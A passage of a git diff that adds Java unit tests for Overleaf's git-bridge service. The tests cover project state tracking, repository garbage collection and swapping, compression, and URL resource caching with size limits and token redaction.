assertNull(dbStore.getOldestUnswappedProject()); + } + + @Test + public void nullLastAccessedTimesDoNotCount() { + dbStore.setLatestVersionForProject("older", 2); + dbStore.setLastAccessedTime( + "older", Timestamp.valueOf(LocalDateTime.now().minus(5, ChronoUnit.SECONDS))); + dbStore.setLatestVersionForProject("newer", 3); + dbStore.setLastAccessedTime("newer", Timestamp.valueOf(LocalDateTime.now())); + assertEquals("older", dbStore.getOldestUnswappedProject()); + dbStore.swap("older", "bzip2"); + assertEquals("newer", dbStore.getOldestUnswappedProject()); + } + + @Test + public void missingProjectLastAccessedTimeCanBeSet() { + dbStore.setLatestVersionForProject("asdf", 1); + dbStore.setLastAccessedTime("asdf", Timestamp.valueOf(LocalDateTime.now())); + assertEquals("asdf", dbStore.getOldestUnswappedProject()); + } + + @Test + public void testGetNumUnswappedProjects() { + dbStore.setLatestVersionForProject("asdf", 1); + dbStore.setLastAccessedTime("asdf", Timestamp.valueOf(LocalDateTime.now())); + assertEquals(1, dbStore.getNumUnswappedProjects()); + dbStore.swap("asdf", "bzip2"); + assertEquals(0, dbStore.getNumUnswappedProjects()); + } + + @Test + public void projectStateIsNotPresentIfNotInDBAtAll() { + assertEquals(ProjectState.NOT_PRESENT, dbStore.getProjectState("asdf")); + } + + @Test + public void projectStateIsPresentIfProjectHasLastAccessed() { + dbStore.setLatestVersionForProject("asdf", 1); + dbStore.setLastAccessedTime("asdf", Timestamp.valueOf(LocalDateTime.now())); + assertEquals(ProjectState.PRESENT, dbStore.getProjectState("asdf")); + } + + @Test + public void 
projectStateIsSwappedIfLastAccessedIsNull() { + dbStore.setLatestVersionForProject("asdf", 1); + dbStore.swap("asdf", "bzip2"); + assertEquals(ProjectState.SWAPPED, dbStore.getProjectState("asdf")); + } + + @Test + public void testDeleteProject() { + dbStore.setLatestVersionForProject("project1", 1); + dbStore.setLatestVersionForProject("project2", 1); + assertEquals(ProjectState.PRESENT, dbStore.getProjectState("project1")); + assertEquals(ProjectState.PRESENT, dbStore.getProjectState("project2")); + dbStore.deleteProject("project1"); + assertEquals(ProjectState.NOT_PRESENT, dbStore.getProjectState("project1")); + assertEquals(ProjectState.PRESENT, dbStore.getProjectState("project2")); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteFilesForProjectSQLUpdateTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteFilesForProjectSQLUpdateTest.java new file mode 100644 index 0000000..03919bf --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/db/sqlite/update/delete/DeleteFilesForProjectSQLUpdateTest.java @@ -0,0 +1,17 @@ +package uk.ac.ic.wlgitbridge.bridge.db.sqlite.update.delete; + +import static org.junit.Assert.*; + +import org.junit.Test; + +public class DeleteFilesForProjectSQLUpdateTest { + + @Test + public void testGetSQL() { + DeleteFilesForProjectSQLUpdate update = + new DeleteFilesForProjectSQLUpdate("projname", "path1", "path2"); + assertEquals( + "DELETE FROM `url_index_store` " + "WHERE `project_name` = ? " + "AND path IN (?, ?);\n", + update.getSQL()); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJobImplTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJobImplTest.java new file mode 100644 index 0000000..fef30e7 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/gc/GcJobImplTest.java @@ -0,0 +1,119 @@ +package uk.ac.ic.wlgitbridge.bridge.gc; + +import static org.junit.Assert.assertFalse; +import static org.mockito.Mockito.*; + +import java.io.IOException; +import java.util.List; +import java.util.concurrent.CompletableFuture; +import java.util.stream.Collectors; +import java.util.stream.IntStream; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.mockito.stubbing.OngoingStubbing; +import uk.ac.ic.wlgitbridge.bridge.lock.LockGuard; +import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock; +import uk.ac.ic.wlgitbridge.bridge.repo.ProjectRepo; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.data.CannotAcquireLockException; +import uk.ac.ic.wlgitbridge.data.ProjectLockImpl; + +/* + * Created by winston on 16/02/2017. 
+ */ +public class GcJobImplTest { + + RepoStore repoStore = mock(RepoStore.class); + + ProjectLock locks; + + GcJobImpl gcJob; + + @Before + public void setup() { + locks = new ProjectLockImpl(); + gcJob = new GcJobImpl(repoStore, locks, 5); + } + + @After + public void teardown() { + gcJob.stop(); + } + + @Test + public void addedProjectsAreAllEventuallyGcedOnce() throws Exception { + int numProjects = 5; + /* Make the mocks, make expectations, and keep a reference to them */ + final OngoingStubbing<ProjectRepo>[] o = + new OngoingStubbing[] {when(repoStore.getExistingRepo(anyString()))}; + List<ProjectRepo> mockRepos = + IntStream.range(0, numProjects) + .mapToObj(i -> String.valueOf((char) ('a' + i))) + .map( + proj -> { + gcJob.queueForGc(proj); + ProjectRepo mockRepo = mock(ProjectRepo.class); + o[0] = o[0].thenReturn(mockRepo); + return mockRepo; + }) + .collect(Collectors.toList()); + CompletableFuture<Void> fut = gcJob.waitForRun(); + gcJob.start(); + fut.join(); + for (ProjectRepo mock : mockRepos) { + verify(mock).runGC(); + verify(mock).deleteIncomingPacks(); + } + /* Nothing should happen on the next run */ + when(repoStore.getExistingRepo(anyString())).thenThrow(new IllegalStateException()); + gcJob.waitForRun().join(); + } + + @Test + public void cannotOverlapGcRuns() throws Exception { + CompletableFuture<Void> runningForever = new CompletableFuture<>(); + gcJob.onPostGc( + () -> { + try { + /* Pretend the GC is taking forever */ + runningForever.join(); + } catch (Throwable e) { + runningForever.completeExceptionally(e); + } + }); + CompletableFuture<Void> fut = gcJob.waitForRun(); + gcJob.start(); + fut.join(); + CompletableFuture<Void> ranAgain = new CompletableFuture<>(); + gcJob.onPreGc(() -> ranAgain.complete(null)); + /* Should not run again any time soon */ + for (int i = 0; i < 50; ++i) { + assertFalse(ranAgain.isDone()); + /* The gc interval is 5 ms, so 50 1ms sleeps should be more than + enough without making the test slow */ + Thread.sleep(1); + } + assertFalse(runningForever.isCompletedExceptionally()); + } + + @Test + public void willNotGcProjectUntilItIsUnlocked() throws InterruptedException, IOException { + ProjectRepo repo = mock(ProjectRepo.class); + when(repoStore.getExistingRepo(anyString())).thenReturn(repo); + gcJob.onPostGc(gcJob::stop); + gcJob.queueForGc("a"); + CompletableFuture<Void> fut = gcJob.waitForRun(); + try (LockGuard __ = locks.lockGuard("a")) { + gcJob.start(); + for (int i = 0; i < 50; ++i) { + assertFalse(fut.isDone()); + Thread.sleep(1); + } + } catch (CannotAcquireLockException e) { + throw new RuntimeException(e); + } + /* Now that we've released the lock, fut should complete */ + fut.join(); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest.java new file mode 100644 index 0000000..0e4b01f --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/repo/FSGitRepoStoreTest.java @@ -0,0 +1,80 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import static org.junit.Assert.*; + +import java.io.*; +import java.nio.file.Path; +import java.nio.file.Paths; +import java.util.Arrays; +import java.util.Optional; +import org.apache.commons.io.FileUtils; +import org.junit.Before; +import org.junit.Test; +import org.junit.rules.TemporaryFolder; +import uk.ac.ic.wlgitbridge.util.Files; + +/* + * Created by winston on 23/08/2016. 
+ */ +public class FSGitRepoStoreTest { + + public static File makeTempRepoDir(TemporaryFolder tmpFolder, String name) throws IOException { + File tmp = tmpFolder.newFolder(name); + Path rootdir = + Paths.get( + "src/test/resources/uk/ac/ic/wlgitbridge/" + "bridge/repo/FSGitRepoStoreTest/rootdir"); + FileUtils.copyDirectory(rootdir.toFile(), tmp); + Files.renameAll(tmp, "DOTgit", ".git"); + return tmp; + } + + private FSGitRepoStore repoStore; + private File original; + + @Before + public void setup() throws IOException { + TemporaryFolder tmpFolder = new TemporaryFolder(); + tmpFolder.create(); + File tmp = makeTempRepoDir(tmpFolder, "rootdir"); + original = tmpFolder.newFolder("original"); + FileUtils.copyDirectory(tmp, original); + repoStore = new FSGitRepoStore(tmp.getAbsolutePath(), Optional.empty()); + } + + @Test + public void testPurgeNonexistentProjects() { + File toDelete = new File(repoStore.getRootDirectory(), "idontexist"); + File wlgb = new File(repoStore.getRootDirectory(), ".wlgb"); + assertTrue(toDelete.exists()); + assertTrue(wlgb.exists()); + repoStore.purgeNonexistentProjects(Arrays.asList("proj1", "proj2")); + assertFalse(toDelete.exists()); + assertTrue(wlgb.exists()); + } + + @Test + public void totalSizeShouldChangeWhenFilesAreCreatedAndDeleted() throws IOException { + long old = repoStore.totalSize(); + File temp = new File(repoStore.getRootDirectory(), "__temp.txt"); + try (OutputStream out = new FileOutputStream(temp)) { + out.write(new byte[16 * 1024 * 1024]); + } + long new_ = repoStore.totalSize(); + assertTrue(new_ > old); + assertTrue(temp.delete()); + long new__ = repoStore.totalSize(); + assertTrue(new__ < new_); + } + + @Test + public void zipAndUnzipShouldBeTheSame() throws IOException { + File expected = new File(original, "proj1"); + File actual = new File(repoStore.getRootDirectory(), "proj1"); + assertTrue(Files.contentsAreEqual(expected, actual)); + InputStream zipped = repoStore.bzip2Project("proj1"); + repoStore.remove("proj1"); + assertFalse(actual.exists()); + repoStore.unbzip2Project("proj1", zipped); + assertTrue(Files.contentsAreEqual(expected, actual)); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest.java new file mode 100644 index 0000000..7222203 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest.java @@ -0,0 +1,172 @@ +package uk.ac.ic.wlgitbridge.bridge.repo; + +import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.lessThan; +import static org.junit.Assert.*; + +import com.google.api.client.repackaged.com.google.common.base.Preconditions; +import java.io.File; +import java.io.IOException; +import java.nio.charset.StandardCharsets; +import java.nio.file.Path; +import java.nio.file.Paths; +import java.util.*; +import java.util.function.Supplier; +import org.apache.commons.io.FileUtils; +import org.junit.Before; +import org.junit.Rule; +import org.junit.Test; +import org.junit.rules.TemporaryFolder; +import uk.ac.ic.wlgitbridge.data.filestore.GitDirectoryContents; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; +import uk.ac.ic.wlgitbridge.data.filestore.RepositoryFile; +import uk.ac.ic.wlgitbridge.snapshot.servermock.util.FileUtil; +import uk.ac.ic.wlgitbridge.util.Files; + +/* + * Created by winston on 08/10/2016. 
+ */ +public class GitProjectRepoTest { + + public static File makeTempRepoDir(TemporaryFolder tmpFolder, String name) throws IOException { + File tmp = tmpFolder.newFolder(name); + Path rootdir = + Paths.get( + "src/test/resources/uk/ac/ic/wlgitbridge/" + "bridge/repo/GitProjectRepoTest/rootdir"); + FileUtils.copyDirectory(rootdir.toFile(), tmp); + Files.renameAll(tmp, "DOTgit", ".git"); + return tmp; + } + + private File rootdir; + FSGitRepoStore repoStore; + GitProjectRepo repo; + GitProjectRepo badGitignore; + GitProjectRepo incoming; + GitProjectRepo withoutIncoming; + + @Rule public TemporaryFolder tmpFolder = new TemporaryFolder(); + + @Before + public void setup() throws IOException { + rootdir = makeTempRepoDir(tmpFolder, "rootdir"); + repoStore = new FSGitRepoStore(rootdir.getAbsolutePath(), Optional.empty()); + repo = fromExistingDir("repo"); + badGitignore = fromExistingDir("badgitignore"); + incoming = fromExistingDir("incoming"); + withoutIncoming = fromExistingDir("without_incoming"); + } + + private GitProjectRepo fromExistingDir(String dir) throws IOException { + GitProjectRepo ret = GitProjectRepo.fromName(dir); + ret.useExistingRepository(repoStore); + return ret; + } + + private GitDirectoryContents makeDirContents(String... contents) { + Preconditions.checkArgument(contents.length % 2 == 0); + List<RawFile> files = new ArrayList<>(contents.length / 2); + for (int i = 0; i + 1 < contents.length; i += 2) { + files.add(new RepositoryFile(contents[i], contents[i + 1].getBytes(StandardCharsets.UTF_8))); + } + return new GitDirectoryContents( + files, + repoStore.getRootDirectory(), + "repo", + "Winston Li", + "git@winston.li", + "Commit Message", + new Date()); + } + + @Test + public void deletingIgnoredFileOnAppDeletesFromTheRepo() throws IOException { + GitDirectoryContents contents = makeDirContents(".gitignore", "*.ignored\n"); + repo.commitAndGetMissing(contents); + repo.resetHard(); + File dir = repo.getDotGitDir(); + assertEquals( + new HashSet<String>(Arrays.asList(".git", ".gitignore")), + new HashSet<String>(Arrays.asList(dir.list()))); + } + + @Test + public void addingIgnoredFilesOnAppAddsToTheRepo() throws IOException { + GitDirectoryContents contents = + makeDirContents( + ".gitignore", + "*.ignored\n", + "file1.ignored", + "", + "file1.txt", + "", + "file2.txt", + "", + "added.ignored", + ""); + repo.commitAndGetMissing(contents); + repo.resetHard(); + assertEquals( + new HashSet<String>( + Arrays.asList( + ".git", ".gitignore", "file1.ignored", "file1.txt", "file2.txt", "added.ignored")), + new HashSet<String>(Arrays.asList(repo.getDotGitDir().list()))); + } + + @Test + public void badGitignoreShouldNotThrow() throws IOException { + GitDirectoryContents contents = + makeDirContents( + ".gitignore", + "*.ignored\n", + "file1.ignored", + "", + "file1.txt", + "", + "file2.txt", + "", + "added.ignored", + ""); + badGitignore.commitAndGetMissing(contents); + } + + private static long repoSize(ProjectRepo repo) { + return FileUtils.sizeOfDirectory(repo.getProjectDir()); + } + + @Test + public void runGCReducesTheSizeOfARepoWithGarbage() throws IOException { + long beforeSize = repoSize(repo); + repo.runGC(); + long afterSize = repoSize(repo); + // gc should shrink a repo that contains garbage + assertThat(afterSize, lessThan(beforeSize)); + } + + @Test + public void runGCDoesNothingOnARepoWithoutGarbage() throws IOException { + repo.runGC(); + long beforeSize = repoSize(repo); + repo.runGC(); + long afterSize = repoSize(repo); + assertThat(beforeSize, equalTo(afterSize)); + } + + @Test + public void 
deleteIncomingPacksDeletesIncomingPacks() throws IOException { + Supplier<Boolean> dirsAreEq = + () -> + FileUtil.directoryDeepEquals(incoming.getProjectDir(), withoutIncoming.getProjectDir()); + assertFalse(dirsAreEq.get()); + incoming.deleteIncomingPacks(); + assertTrue(dirsAreEq.get()); + } + + @Test + public void deleteIncomingPacksOnDirWithoutIncomingPacksDoesNothing() throws IOException { + File actual = withoutIncoming.getProjectDir(); + File expected = tmpFolder.newFolder(); + FileUtils.copyDirectory(actual, expected); + withoutIncoming.deleteIncomingPacks(); + assertTrue(FileUtil.directoryDeepEquals(actual, expected)); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/resource/UrlResourceCacheTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/resource/UrlResourceCacheTest.java new file mode 100644 index 0000000..f49822a --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/resource/UrlResourceCacheTest.java @@ -0,0 +1,118 @@ +package uk.ac.ic.wlgitbridge.bridge.resource; + +import static org.mockito.ArgumentMatchers.any; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.verify; +import static org.mockito.Mockito.when; + +import io.netty.handler.codec.http.DefaultHttpHeaders; +import io.netty.handler.codec.http.HttpHeaders; +import java.io.IOException; +import java.util.HashMap; +import java.util.Optional; +import java.util.concurrent.ExecutionException; +import org.junit.Test; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.util.CastUtil; +import uk.ac.ic.wlgitbridge.git.exception.SizeLimitExceededException; +import uk.ac.ic.wlgitbridge.io.http.ning.NingHttpClientFacade; +import uk.ac.ic.wlgitbridge.util.FunctionT; + +public class UrlResourceCacheTest { + + private static String PROJ = "proj"; + + private static String URL = "http://localhost/file.jpg"; + + private static String NEW_PATH = "file1.jpg"; + + private final NingHttpClientFacade http = mock(NingHttpClientFacade.class); + + private final DBStore dbStore = mock(DBStore.class); + + private final UrlResourceCache cache = new UrlResourceCache(dbStore, http); + + private static HttpHeaders withContentLength(long cl) { + return new DefaultHttpHeaders().add("Content-Length", String.valueOf(cl)); + } + + private void respondWithContentLength(long cl, long actual) throws ExecutionException { + when(http.get(any(), any())) + .thenAnswer( + invoc -> { + Object[] args = invoc.getArguments(); + //noinspection unchecked + ((FunctionT<HttpHeaders, Boolean, SizeLimitExceededException>) args[1]) + .apply(withContentLength(cl)); + return new byte[CastUtil.assumeInt(actual)]; + }); + } + + private void respondWithContentLength(long cl) throws ExecutionException { + respondWithContentLength(cl, cl); + } + + private void getWithMaxLength(Optional<Long> max) throws IOException, SizeLimitExceededException { + cache.get(PROJ, URL, NEW_PATH, new HashMap<>(), new HashMap<>(), max); + } + + private void getUrl(String url) throws IOException, SizeLimitExceededException { + cache.get(PROJ, url, NEW_PATH, new HashMap<>(), new HashMap<>(), Optional.empty()); + } + + private void getWithMaxLength(long max) throws IOException, SizeLimitExceededException { + getWithMaxLength(Optional.of(max)); + } + + private void getWithoutLimit() throws IOException, SizeLimitExceededException { + getWithMaxLength(Optional.empty()); + } + + @Test + public void getDoesNotThrowWhenContentLengthLT() throws Exception { + 
respondWithContentLength(1); + getWithMaxLength(2); + } + + @Test + public void getDoesNotThrowWhenContentLengthEQ() throws Exception { + respondWithContentLength(2); + getWithMaxLength(2); + } + + @Test(expected = SizeLimitExceededException.class) + public void getThrowsSizeLimitExceededWhenContentLengthGT() throws Exception { + respondWithContentLength(3); + getWithMaxLength(2); + } + + @Test + public void getWithEmptyContentIsValid() throws Exception { + respondWithContentLength(0); + getWithMaxLength(0); + } + + @Test + public void getWithoutLimitDoesNotThrow() throws Exception { + respondWithContentLength(Integer.MAX_VALUE, 0); + getWithoutLimit(); + } + + @Test(expected = SizeLimitExceededException.class) + public void getThrowsIfActualContentTooBig() throws Exception { + respondWithContentLength(0, 10); + getWithMaxLength(5); + } + + @Test + public void tokenIsRemovedFromCacheKey() throws Exception { + String url = + "http://history.overleaf.com/projects/1234/blobs/abdef?token=secretencryptedstuff&_path=test.tex"; + String cacheKey = + "http://history.overleaf.com/projects/1234/blobs/abdef?token=REMOVED&_path=test.tex"; + respondWithContentLength(123); + getUrl(url); + verify(dbStore).getPathForURLInProject(PROJ, cacheKey); + verify(dbStore).addURLIndexForProject(PROJ, cacheKey, NEW_PATH); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobImplTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobImplTest.java new file mode 100644 index 0000000..3956d28 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/job/SwapJobImplTest.java @@ -0,0 +1,170 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.job; + +import static org.junit.Assert.assertEquals; +import static org.junit.Assert.assertTrue; + +import java.io.IOException; +import java.sql.Timestamp; +import java.time.Duration; +import java.time.LocalDateTime; +import java.time.temporal.ChronoUnit; +import org.apache.commons.io.FileUtils; +import org.junit.After; +import org.junit.Before; +import org.junit.Test; +import org.junit.rules.TemporaryFolder; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.db.sqlite.SqliteDBStore; +import uk.ac.ic.wlgitbridge.bridge.lock.ProjectLock; +import uk.ac.ic.wlgitbridge.bridge.repo.FSGitRepoStore; +import uk.ac.ic.wlgitbridge.bridge.repo.FSGitRepoStoreTest; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.bridge.swap.store.InMemorySwapStore; +import uk.ac.ic.wlgitbridge.bridge.swap.store.SwapStore; +import uk.ac.ic.wlgitbridge.data.ProjectLockImpl; + +/* + * Created by winston on 20/08/2016. 
+ */ +public class SwapJobImplTest { + + private SwapJobImpl swapJob; + + private ProjectLock lock; + private RepoStore repoStore; + private DBStore dbStore; + private SwapStore swapStore; + + @Before + public void setup() throws IOException { + TemporaryFolder tmpFolder = new TemporaryFolder(); + tmpFolder.create(); + lock = new ProjectLockImpl(); + repoStore = + new FSGitRepoStore( + FSGitRepoStoreTest.makeTempRepoDir(tmpFolder, "repostore").getAbsolutePath(), + 100_000, + FileUtils::sizeOfDirectory); + dbStore = new SqliteDBStore(tmpFolder.newFile()); + dbStore.setLatestVersionForProject("proj1", 0); + dbStore.setLatestVersionForProject("proj2", 0); + dbStore.setLastAccessedTime("proj1", Timestamp.valueOf(LocalDateTime.now())); + dbStore.setLastAccessedTime( + "proj2", Timestamp.valueOf(LocalDateTime.now().minus(1, ChronoUnit.SECONDS))); + swapStore = new InMemorySwapStore(); + swapJob = + new SwapJobImpl( + 1, + 15000, + 30000, + Duration.ofMillis(100), + SwapJob.CompressionMethod.Bzip2, + lock, + repoStore, + dbStore, + swapStore); + } + + @After + public void teardown() { + if (swapJob != null) { + swapJob.stop(); + } + } + + private void waitASecond() { + try { + Thread.sleep(1 * 1000); + } catch (Exception _e) { + } + } + + @Test + public void startingTimerAlwaysCausesASwap() { + swapJob.lowWatermarkBytes = 16384; + swapJob.interval = Duration.ofHours(1); + assertEquals(0, swapJob.swaps.get()); + swapJob.start(); + do { + waitASecond(); + } while (swapJob.swaps.get() <= 0); + assertTrue(swapJob.swaps.get() > 0); + } + + @Test + public void swapsHappenEveryInterval() { + swapJob.lowWatermarkBytes = 16384; + assertEquals(0, swapJob.swaps.get()); + swapJob.start(); + do { + waitASecond(); + } while (swapJob.swaps.get() <= 1); + assertTrue(swapJob.swaps.get() > 1); + } + + @Test + public void noProjectsGetSwappedWhenUnderHighWatermark() { + swapJob.highWatermarkBytes = 65536; + assertEquals(2, dbStore.getNumUnswappedProjects()); + swapJob.start(); + do { + waitASecond(); + } while (swapJob.swaps.get() < 1); + assertEquals(2, dbStore.getNumUnswappedProjects()); + } + + @Test + public void correctProjGetSwappedWhenOverHighWatermark() throws IOException { + swapJob.lowWatermarkBytes = 16384; + assertEquals(2, dbStore.getNumUnswappedProjects()); + assertEquals("proj2", dbStore.getOldestUnswappedProject()); + swapJob.start(); + do { + waitASecond(); + } while (swapJob.swaps.get() < 1); + assertEquals(1, dbStore.getNumUnswappedProjects()); + assertEquals("proj1", dbStore.getOldestUnswappedProject()); + assertEquals("bzip2", dbStore.getSwapCompression("proj2")); + swapJob.restore("proj2"); + assertEquals(null, dbStore.getSwapCompression("proj2")); + int numSwaps = swapJob.swaps.get(); + do { + waitASecond(); + } while (swapJob.swaps.get() <= numSwaps); + assertEquals(1, dbStore.getNumUnswappedProjects()); + assertEquals("proj2", dbStore.getOldestUnswappedProject()); + } + + @Test + public void swapCompressionGzip() throws IOException { + swapJob = + new SwapJobImpl( + 1, + 15000, + 30000, + Duration.ofMillis(100), + SwapJob.CompressionMethod.Gzip, + lock, + repoStore, + dbStore, + swapStore); + swapJob.lowWatermarkBytes = 16384; + assertEquals(2, dbStore.getNumUnswappedProjects()); + assertEquals("proj2", dbStore.getOldestUnswappedProject()); + swapJob.start(); + do { + waitASecond(); + } while (swapJob.swaps.get() < 1); + assertEquals(1, dbStore.getNumUnswappedProjects()); + assertEquals("proj1", dbStore.getOldestUnswappedProject()); + assertEquals("gzip", 
dbStore.getSwapCompression("proj2")); + swapJob.restore("proj2"); + assertEquals(null, dbStore.getSwapCompression("proj2")); + int numSwaps = swapJob.swaps.get(); + do { + waitASecond(); + } while (swapJob.swaps.get() <= numSwaps); + assertEquals(1, dbStore.getNumUnswappedProjects()); + assertEquals("proj2", dbStore.getOldestUnswappedProject()); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/store/InMemorySwapStoreTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/store/InMemorySwapStoreTest.java new file mode 100644 index 0000000..a5a9f39 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/store/InMemorySwapStoreTest.java @@ -0,0 +1,56 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.store; + +import static org.junit.Assert.assertArrayEquals; + +import java.io.ByteArrayInputStream; +import java.io.IOException; +import org.apache.commons.io.IOUtils; +import org.junit.Rule; +import org.junit.Test; +import org.junit.rules.ExpectedException; + +/* + * Created by winston on 23/08/2016. + */ +public class InMemorySwapStoreTest { + + private final InMemorySwapStore swapStore = new InMemorySwapStore(); + + @Rule public final ExpectedException exception = ExpectedException.none(); + + @Test + public void downloadingNonExistentFileThrows() { + exception.expect(IllegalArgumentException.class); + swapStore.openDownloadStream("asdf"); + } + + @Test + public void canDownloadUploadedFiles() throws IOException { + byte[] proj1Contents = "helloproj1".getBytes(); + byte[] proj2Contents = "asdfproj2".getBytes(); + swapStore.upload("proj1", new ByteArrayInputStream(proj1Contents), proj1Contents.length); + swapStore.upload("proj2", new ByteArrayInputStream(proj2Contents), proj2Contents.length); + assertArrayEquals(proj1Contents, IOUtils.toByteArray(swapStore.openDownloadStream("proj1"))); + assertArrayEquals(proj2Contents, IOUtils.toByteArray(swapStore.openDownloadStream("proj2"))); + } + + @Test + public void uploadingForTheSameProjectOverwritesTheFile() throws IOException { + byte[] proj1Contents = "helloproj1".getBytes(); + byte[] proj1NewContents = "goodbyeproj1".getBytes(); + swapStore.upload("proj1", new ByteArrayInputStream(proj1Contents), proj1Contents.length); + assertArrayEquals(proj1Contents, IOUtils.toByteArray(swapStore.openDownloadStream("proj1"))); + swapStore.upload("proj1", new ByteArrayInputStream(proj1NewContents), proj1NewContents.length); + assertArrayEquals(proj1NewContents, IOUtils.toByteArray(swapStore.openDownloadStream("proj1"))); + } + + @Test + public void canRemoveFiles() throws IOException { + byte[] projContents = "total garbage".getBytes(); + swapStore.upload("proj", new ByteArrayInputStream(projContents), projContents.length); + assertArrayEquals(projContents, IOUtils.toByteArray(swapStore.openDownloadStream("proj"))); + swapStore.remove("proj"); + exception.expect(IllegalArgumentException.class); + swapStore.openDownloadStream("proj"); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/store/S3SwapStoreTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/store/S3SwapStoreTest.java new file mode 100644 index 0000000..3bbdfe0 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/bridge/swap/store/S3SwapStoreTest.java @@ -0,0 +1,42 @@ +package uk.ac.ic.wlgitbridge.bridge.swap.store; + +import org.junit.Before; + +/* + * Created by winston on 21/08/2016. 
+ */ +public class S3SwapStoreTest { + + private static final String accessKey = null; + private static final String secret = null; + private static final String bucketName = "com.overleaf.testbucket"; + private static final String region = "us-east-1"; + + private S3SwapStore s3; + + @Before + public void setup() { + if (accessKey == null || secret == null) { + s3 = null; + return; + } + s3 = new S3SwapStore(accessKey, secret, bucketName, region); + } + + // @Ignore + // @Test + // public void testUploadDownloadDelete() throws Exception { + // assumeNotNull(s3); + // String projName = "abc123"; + // byte[] contents = "hello".getBytes(); + // s3.upload( + // projName, + // new ByteArrayInputStream(contents), + // contents.length + // ); + // InputStream down = s3.openDownloadStream(projName); + // s3.remove(projName); + // assertArrayEquals(contents, IOUtils.toByteArray(down)); + // } + +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/data/model/ResourceFetcherTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/data/model/ResourceFetcherTest.java new file mode 100644 index 0000000..1f27966 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/data/model/ResourceFetcherTest.java @@ -0,0 +1,74 @@ +package uk.ac.ic.wlgitbridge.data.model; + +import static org.junit.Assert.assertEquals; +import static org.mockserver.model.HttpRequest.request; +import static org.mockserver.model.HttpResponse.response; + +import java.io.IOException; +import java.util.HashMap; +import java.util.Map; +import java.util.Optional; +import org.jmock.Expectations; +import org.jmock.Mockery; +import org.junit.Rule; +import org.junit.Test; +import org.junit.rules.TemporaryFolder; +import org.mockserver.client.MockServerClient; +import org.mockserver.junit.MockServerRule; +import uk.ac.ic.wlgitbridge.bridge.db.DBStore; +import uk.ac.ic.wlgitbridge.bridge.repo.FSGitRepoStore; +import uk.ac.ic.wlgitbridge.bridge.repo.ProjectRepo; +import uk.ac.ic.wlgitbridge.bridge.repo.RepoStore; +import uk.ac.ic.wlgitbridge.bridge.resource.ResourceCache; +import uk.ac.ic.wlgitbridge.bridge.resource.UrlResourceCache; +import uk.ac.ic.wlgitbridge.data.filestore.RawFile; +import uk.ac.ic.wlgitbridge.git.exception.GitUserException; + +/* + * Created by m on 20/11/15. + */ +public class ResourceFetcherTest { + @Rule public MockServerRule mockServerRule = new MockServerRule(this); + + private MockServerClient mockServerClient; + + @Test + public void fetchesFilesThatAreMissingFromUrlStoreCache() throws IOException, GitUserException { + final String testProjectName = "123abc"; + final String testUrl = "http://localhost:" + mockServerRule.getPort() + "/123abc"; + final String oldTestPath = "testPath"; + final String newTestPath = "missingPath"; + + mockServerClient + .when(request().withMethod("GET").withPath("/123abc")) + .respond(response().withStatusCode(200).withBody("content")); + + final Mockery context = new Mockery(); + final DBStore dbStore = context.mock(DBStore.class); + context.checking( + new Expectations() { + { + // It should fetch the file once it finds it is missing. + oneOf(dbStore).getPathForURLInProject(testProjectName, testUrl); + will(returnValue(oldTestPath)); + + // It should update the URL index store once it has fetched; at present, it does not + // actually change the stored path. 
